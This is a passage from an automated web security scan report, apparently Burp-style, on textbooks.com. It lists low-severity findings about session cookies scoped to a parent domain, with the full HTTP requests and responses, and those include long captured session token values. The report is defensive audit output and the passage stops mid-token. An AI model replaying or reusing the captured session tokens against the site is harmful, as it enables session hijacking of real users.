Set-Cookie: TBSESSION=wVCAnSNMnugJPpqPvFnYLMkeWndthnmqOhEEEMhiZx7wwIrip2hgQbExDho5rACzBkbkz%2B3tboQXXlEDqY88uSi9toJS5amCgvJPhU4%2B6u9GSdi8%2BPyG%2FPHQvDdA4iaiM3q14eVdOOwqGm9iho7gvHyDXRxe4e8yVF5u%2BLLtpF%2BNU9xtvy8uIaYtSKwPHOXe95vJZ2sxZ61yI4Vil5U6Xm6KDiMccJ5ge%2B9E9bjkdpVc0NujtdUwLCCL3z47t7PtcP4msfxpne4hgQ%2FYWGoFG9MoHHDeLG6luMmQtuxDrxl3MR9%2FAtb4xeckgUoU44e9SBigB344iGRmTf%2BtNjNfC0ykRdE6VebMxy6jhHj9gJBJsgt2ntC713Paqp3C%2FJAUgP0Br3ythzZAz7D6iFMtMNBzDo4Fl4xEuitZ2lOR7sXmQietPoNi1WISNuxDA3icHt1jTdPegalrRpEOjCmezWLHTNmCa0b1Qyr4ttsiU0p57ceZSAYRXXLoKMcL0zlkYnxPefNKQEVldegCt8IiE3D6VSetpkpM0C%2Fw9uwRe1L%2BeeaNNQZOCg1UmKrg92X8Nq3rzRqwZ48mZ8FbhxwZmmYSH44A9%2BSsUgoj6D4d4acf2cz2kIKi%2B8jLdUfP%2B0Ps6wpjtrbRhL%2FLDs7FEVzfy2BgzumkfGlb%2Bdc4cX3MrlwJNwTUp2qBlPFz8yAEmKxgET5qgaqGUPyX9U%2BMyc8kDwxtK5wyU%2FY1AQEzWn6WaFz%2Fe2iFwZKmDXUKmphRky1llznv%2BlpxbUSqLjBMUGG0scgpl5cZM3yhD7J0OKv4N%2BYEXkTZEFCHS5nkl%2BOo4FouixU%2BYQdKUi%2BmVxi%2BUvD9w1aYsjz6%2BNoMycuC4w%2BeDttlVLzyrLIjJq%2FibjXg72tvZAHkgRCGVL79zhZdj%2BNJxB%2BdE%2BD063jHaMboSA00YzWTOxLBG0Y1T0FI3DDr945czdlm%2FhXsxYdsUWGBE78jwuCvv4uyrPPUy2MSA0%2BY3S%2BQbz1HW7RDjRpTR%2Bu8iklBcRjxymy2ni4%2BibkO%2FBu%2B%2FEg2YATkLrcAwAvPMsssQFrbB%2FBZknDBAdfO%2FeIGdcFruitxdNw%2BBgS9C4Yem0urLAM1Ufx98XKKFEOg6KItVaExFRTJpUJBDEx3e9izECdNY5EJz2AdN3BbCdgCVZCjIlD78CQcgQQljR6vOrpi8pYFeBJ7t9G0rvLfZdyljwoeXFt0xiVNXwNwwb6U2hZEewgXRtwsR%2FYbzDj2xs%2Fx2V2q%2Fz9nRSUpCrtZ%2FMw%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=H2iNa2p5mG9uGr594ec%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 125397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GiHxY1D3cco5MVEkJIPPzVJuChM3fY39LY0RqwQktwWvsjTa0JW2BsknacfepGmlFDIZbbqDxckkx7cS%2B2gpBVd81euP6li0UkLy4rhaA%2Bodl97BdkV%2FNWgvhpwdKClEa6%2BAtfXODXEjew%2B9zK8CWS0yYQk57HF%2FnqvaSCctClM%2BIvvJZqIx%2FeNhi2pB7ep4zZ2njrU6BryD7vlbHDKSWd0bp4zA9mC8VfRHw0tVL3BBHcm2uY9Sevw5VFDyiGx1OEqQrxHi6tAC4D1DuZrcv4DzoyNLtKQWJuWID%2F5qJhubasF%2Bm28PpefqDT5cYODfBNRkKZmIa%2FUFQ%2FX2Qbr8CP0VhjYF12bO%2BxxTRKvAcqkXYmALAwnnee4IcJUVSicNatp1mwue8oTX1n7YFTQB10OyP3whu4fkDusZhf9pCKxG9JYbsFbb3dIFtzrtS74XTNXHE%2BomeT%2FLpL4ivx2QD02pSPCb%2BWPNQAe23fmkcONLpzuY6Omfgsdh3paEJb6jYOVvb9mjERi6Df9TXSE1OT98M2ca%2F0KExDmuLmLdIfNWK7vm%2FG2uznIQv8oNMt3K4uJ0j%2BMxdyKq0lkgnm3300m7McnZyQV%2BwpM%2BOCXdpyrkzniMBkmcs%2BjGbxYVr%2FSqNHtICgvpQIiu6ijTVrgTyT2fL2W0kliEQ0dHSxptuAICRwjSSUwbngIp3YgysuskgApfkMVgGvmOvFrDXf6bZ56tc01ItN%2BSIl8BuFqDlUeo5dtF2e8GUy3g5%2BNGkwId%2B%2BgUojbARJE2QQDDy1zdhAEjPbyXyMHTLA%2FJ6CU1crFQtGgYSbHQJDEArhhh1OLIsN9HSIOM9YX4IpDgE8zq0Vx2SdjrD74pL%2FxsdepKhsGQH6vOGMcv8JAEoHcNg1qtYDsU%2BRDQf7MmtzllrDVWi8FyM7nL63JML1PYKJu0RgPh935Po%2B1rYA%2BOCQgs8WMMhIODH77ncgKZ1v8MHkCe3SOzwSoWTaYOwcukdGlwbQE2Di9t1zECsrDQHQEScSodmEpNcDKuJroACTyFrDWhR4AV1Qtcli8UoAmW0T0wrX7O9%2FcsTGZFbaYdfw%2FWPpdq6zCXpj9%2FFdLOQroa6wGM88lqtvUZfEQU3XiZcChM7vky1TwVEf6XoBbuAtAiNO4JVrBOynByFkyFhRWgQTVGuzS323Qbx8nx8rqbA6zSxvUd%2FNUrxyBGaWeRe5N6OzorGK96RwA9bGF57MwpWxOX15ngqzMBLXcGiwGBlVkUjo%2FjUYwl0eyDR9%2B22xI%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=f39%2Fcfnu9ABQ2dwwkCM%3D; expires=Mon, 26-Dec-2011 13:52:15 GMT; path=/; domain=.textbooks.com
Content-Length: 146725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=fG72Ywc0mypIeiUOVirDicOhdEiMF9lcHZcxvnN9IfzPHM7%2Fdj6%2Bxzm2f0ExlpWk4NOHPwyiv2FQjPkEPftsUH444oS5QEj%2F7FcoUz%2F2UiarYADCZBV7bvB3t5em%2FkVyJAd13MqPgRmdN2unHuNkWq9c%2F9dHAypavFCO6mEdofd1xL1RzdrXOI7y54sKeTyeqsSLcpiM0yw3lM%2Fl7pIsuPDE51V882MXAvAFaGcuq4oSE1p54pfpDlab5dOH%2F4NwnOo%2FoPR9mR4uKgizRaHMEfKeq8uePaO18QCdSAVHwGHiEHGPifga%2FilOSfknVYckULN12xqKaHN9wmROhId29IVAbZVf%2FWs9FTdrgnTc0sIVJH1b%2FyGV6M%2Fx7aJSPtZmpBbe9vKoCIk03t8P6P5H6z89b90540ITX%2BDzPg7nPblJrmhTlDQLUmFTM%2BqIVOs37TM2UIqGD24KmfexRXtcqEYwVdJ21gHCCRYTS9WyfWfzjON%2FQ0KAoZeMJsMlq0UsCFnJpmJqvGFORGTo1rnW2zOukOBvEllteDcqTU1q%2F%2F962rv93ZZ5vqDyhd%2FCUiCPa59XC%2Bn1JaiuiwlaZTZb%2B%2BArlq%2FwRRJgGrBzun%2BnCmsdVfGKn%2FWbd3pRcSA26F%2F39rjk0iSmvFHv8wa2FfpqH7nrqzrliOwI6qBbrkxrmFOoMnw1dZqVWZ4bb2Kfdxiy17Xo54RGASv10NyRfy%2BxNlpdpE4gPFJ2D0oJiUJgw96ju5zbbWWJg%2BAvVuMOQtxANnyUh8UlAxmfQnFx07C5io5AUYQLOI%2BoVD9dlQ8iEPMFE3KsPPH6madVkp5cTgPNWZXrbsoREQE88WSqo84sVQdSCp4IGUUuYx5Tamm8K5NYWfp4u1Xl1%2FCA1AiZqK%2BuWauYeTfEYgpjvbRaOTe41ZI31yjXfm9COC9PrMxQ9ErUmiZTBatdCSjZm6ppWKahFzB4eRopdj8pMlfqYQEH1iIsh3x1nHkCohb9Uh%2FD4m44o%2F13bg%2FyvaW9bPkF1IWVpPHxfkRlWqleiApjRZKmq6d53e28A4aMRtQ3NA8n%2F35Bu2jPSNcVbltPAFqXUMxQxeBcLO7Tk4wzYbu3Vn5JTsBORC2Qgk7G4a4bACsuyrCcH3zK089TfsN6WRQL7W3HTmNTgvaVDOTNRLDM9EvnASzyZ%2Btl9bPGmSxspfpY%2B%2BKX42HaojTJAQpfsRM4F5PpT0TfOkPuEO9ngIzhsYMyogEE%2FZUZp1ZCkzpFSr8sj74FUoPB3ZkZ9wgxwPM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=WoYEsU7gFTAI7ua5Jys%3D; expires=Mon, 26-Dec-2011 13:52:14 GMT; path=/; domain=.textbooks.com
Content-Length: 117783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=sRYyuJOpJ49sOCeckknOc8%2Fcs7RloEdBrMTr%2BX3T%2Bk%2Fv5pt27NdGyXLZyzHucDE8rXw4%2BfXsIr%2BCpN%2FCtHnuYa3NhYsfMh1QILSzU0MQIwQSWjzH5ToSGVnucX%2FtpdrAFMOj40dnQIioGkv0lpLlh2CtLgep8EcFQkfDXd37cLPs%2F5o4moXMvG1hY%2FbOER3D8irgpVWkuKtwTW0gZlJICUzR7Oim3d7liJhxzJRh58EQ8TeQF49kQik%2B2Pbf%2F6iOUswk13E3R98PHRxmemNdFbEzMQY7sP6LnVqvP20o3LEBQJ909k2KRX5f0sWvYiQ4KUC6qfPO99mDNegJMJWUKpPxiHIhJMTIROOzS6bsKoXb%2BvPsP%2FP03aFufgrd9rpQ98wYCRLSKVp7jJHiJKkZum3qkL03Q8x5xMjayRIZYSFjKoFzRnUPA9sws2plGK0DGgcF0hozx64Ui7XNou1VK7rjpta3BzKYl%2FZ3rWS0xgA9ui8uEG9w%2F%2FS1iwAQFXhbClubDGgBSWowXccDFQ6DLQJrPF6B2%2BqP2JO%2BSwAridOtOG5%2F2%2BxIu%2Frn46TQJ6rSxOPo0APQEJDeF9TjV0%2Fi6APMF%2F3NxURl%2Bkec6xnuRS%2BE%2BHEkwzDXMWkB%2FEl%2FgzpR1LDtO%2F5ngIlCKnsVkA0dvevJ9c5zYJuqsIBqxqa1XgiWjtXPKZ3ZjDSuiD0llOGuAuphsEA1Yud9z80eI3Q9ZOpWewU2MCt0ZZr%2Bsx%2Flr2atJm%2FxXiCajcLKoUvr%2B9cZn%2BF8TxjgxpW6IKoDYHZgvnKORQGFMkhNDX3gvCyMx50hbSffl8DAsRJ%2Bf4a%2BJLjp7AM8ZspOEc49d4eQTnb6JfEaWVHdBb46O1cs9zuiML%2FK1a4i9ejOJ0qnkaYq8G2xDWH8OATLTwnJVfLGfQSCPmeq8N%2FPLFNHozymdd%2FHoE0WPkEKlHtqjdmul2aFkV9xnXsnVgFGvVA7b4D5urcsmpRWX6ICBAYhWCl2IUfMwwFkgRlEu9fkC7Ei5P6ZVAuzjxTlz5gCui5CrEHqqRXT3b4NdXcpJRhQ9EagWvIhwfj4YnUzAuKByVFMouxFQ3D5np%2F2qYDux1fTn3nDdYxKKtzdYucTC5rC4W7NorEgxxk9oe5HyJ8TaWzd%2FAFnPtmL496iB%2BX%2BQnOVeu0viFPg8vSqeB1WbskKzuPDZ%2F5bS7WGLtt3dXY1FF5UtHoAl5rPM8e%2FDm%2FGbFP2LhOgr%2FZNbbfNBaPjEjC8ZgxgtIRAENMKOVS0CmSPihhzINs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RtMIGQwLOLtYgRObJxw%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 131056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.17. http://www.textbooks.com/Catalog/P/Medicine.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=CdH9LFYD8Vfry2EqmBGV%2B1LHC2Md9X2lIMPio%2FZHBDjj4lVYpYgFIgBJ2fDWTkgw9xwkv7JTa3ODRzvHY5dDJ187ZpfbF2xzOcgnuFAkv6DjdOCYMBmRszo%2Bt3tHlCCgViu%2FVMvYjSfG5bArg%2BaI7JjQroKb4QrzZHjip%2FKl7yEj%2FlCOWSL3e8A3nj4v1x7I4E5wRb7OKIqQmRWFocfauhZg6DBqOHAqfSXI6iVzS%2FvAm7%2FozZa2KLjjKqrhvw0JtsOpvSwUWDDrNfrSe8dZZWgDFYm0rlXdG8AXSKsFKKYE66tVpC8kgBXpRqIFjjMIirpNo%2F68Lhjtk5AxY1yIDT%2BOCOpryeVSfwXDLbJs5waIwRrOxK1VH7ISOVueu%2BbpS1gJw5bYRsAWLJIoQgjgYkNWc5wBxC7ykmjMyhtdgG35qEGcVeQTB01Q9nLqyjJyP83oPXAeGgupg0K7BIa7omAQPLXmG1OCeCYhxU5Uo8VgAaNNVjqNcA5RhO5xq5O%2FTl7vKdNE4zNaC5%2FN8fVAmfHjCjyKMvkFGW3sRHJ40p4AfJxSZGaXn92bx2VgohnBZfsUn0lSJ%2FDVp6nYl608o6In5ET35pQZFXiPKm%2F1ZvVHOilc%2B7ORIa0oZjLjqI3sBUiQ%2FbWqZj83T527z%2Fl3OcnyHIrm3k2sJ7G%2FpAoUurp6oUCFlofRkxk8ytG61j6%2BduJJrOURZcTpBLK9XPVgU5yTnkwSKBO%2BnwfvOS2XKzs6T1kPMUfZmAu%2B65HJ2QI8w91XdFq7ERP2wjH38FionnVC0M%2FuteGwFVv0nTjbFkLy3zabxNsPrqcsYB9lJGTcq2WZJOvxCve7uuPaz1RIveOtFQmAzvpHeHGJcZZO47MDIEZu4o